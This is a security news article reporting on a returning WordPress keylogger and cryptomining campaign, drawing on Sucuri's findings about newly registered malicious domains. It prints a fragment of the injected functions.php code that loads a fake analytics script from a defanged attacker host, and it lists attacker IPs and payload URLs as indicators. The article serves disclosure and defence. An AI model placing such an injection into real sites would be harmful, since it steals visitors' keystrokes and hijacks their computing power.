Friday, March 29, 2024

Dangerous WordPress Keylogger Returns via New Domains that Affected More than 1000 Websites

A WordPress keylogger that already spreading via Cloudflare.solutions has changed now and it returns via new domains that affected more than 1000 of WordPress websites.

Last year This WordPress keylogger has been discovered inĀ  Cloudflare[.]solutions and the domain was completely taken down but attackers now registered a new domains.

There are three new domains were identifiedĀ  cdjs[.]online , cdns[.]ws, msdns[.]online and these 3 Malicious domains are responsible for injecting Keylogger into thousands of websites.

According to Sucuri, 129 websites for cdns[.]ws and 103 websites for cdjs[.]online, but itā€™s likely that the majority of the websites have not been indexed yet. Since mid-December, msdns[.]online has infected over a thousand websites.

Also ReadĀ  Malware Abuse Google Ads to Injecting Coinhive Cryptocurrency Miner

How does this WordPress keylogger Works

Attackers are using many malicious scripts that injected into targeting WordPress websites Database directly and compromise it.

The cdjs[.]online based Script injected into WordPress database file calledĀ wp_posts table or themesĀ functions.php file and also other 2 scripts also injected into this file.

function chmnr_klgr_enqueue_script() {
wp_enqueue_script( 'chmnr_klgr-js', 'hxxps://cdns[.]ws/lib/googleanalytics.js', false );

cdjs[.]online also performing to inject 3 obfuscated fake googleanalytics.js same as the previous version of the campaign.

Also, Researchers found that fake jQuery has been used for injecting the encrypted CoinHive crypto mining in the targeted website.

Last year cloudflare[.]solutions was injected the /lib/kl.js script as a keylogger and the site was taken down later.

Accorinding to Securi, The only changes are the socketURL address, which now decodes to ā€œwss://cdjs[.]online:8085/ā€ (instead of wss://cloudflare[.]solutions:8085) and the red herring part of the linterkeys variables changed from ā€œhttps://cdnjs.cloudflare.com/ajax/libs/linter/linter.jsā€ to a more neutral ā€œhttps://js.io/queryā€.

The keylogger will behave the same way in Newly infected website as previous campaigns that is displaying unwanted banners at the bottom of the page which appears 15 seconds after browsing the website due to injectingĀ  the Cloudflare[.]solutions Scripts in function.php.

msdns[.]online Malicious Domain can perform as a crypto miners and keylogger also it located in the same server as cdns[.]ws.

Three Malicious IPs

Securi has identified that this new attack is utilizing the following 3 servers:

  • 185.209.23.219 (cdjs[.]online, or 3117488091, where you can still find the cloudflare[.]solutions version of the keylogger)
  • 185.14.28.10 (or 3104709642, which still hosts the hxxp://185.14.28 .10/lib/jquery-3.2.1.min.js?v=3.2.11 crypto miners and the cloudflare[.]solutions version of the keylogger hxxp://185 .14 .28. 10/lib/kl.js)
  • 107.181.161.159 (cdns[.]ws and msdns[.]online ā€“ which serves new versions of the cryptominers and keyloggers)
Website

Latest articles

Beware Of Weaponized Air Force invitation PDF Targeting Indian Defense And Energy Sectors

EclecticIQ cybersecurity researchers have uncovered a cyberespionage operation dubbed "Operation FlightNight" targeting Indian government...

WarzoneRAT Returns Post FBI Seizure: Utilizing LNK & HTA File

The notorious WarzoneRAT malware has made a comeback, despite the FBI's recent efforts to...

Google Revealed Kernel Address Sanitizer To Harden Android Firmware And Beyond

Android devices are popular among hackers due to the platformā€™s extensive acceptance and open-source...

Compromised SaaS Supply Chain Apps: 97% of Organizations at Risk of Cyber Attacks

Businesses increasingly rely on Software as a Service (SaaS) applications to drive efficiency, innovation,...

IT and security Leaders Feel Ill-Equipped to Handle Emerging Threats: New Survey

A comprehensive survey conducted by Keeper Security, in partnership with TrendCandy Research, has shed...

How to Analyse .NET Malware? – Reverse Engineering Snake Keylogger

Utilizing sandbox analysis for behavioral, network, and process examination provides a foundation for reverse...

GoPlus’s Latest Report Highlights How Blockchain Communities Are Leveraging Critical API Security Data To Mitigate Web3 Threats

GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report highlighting...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles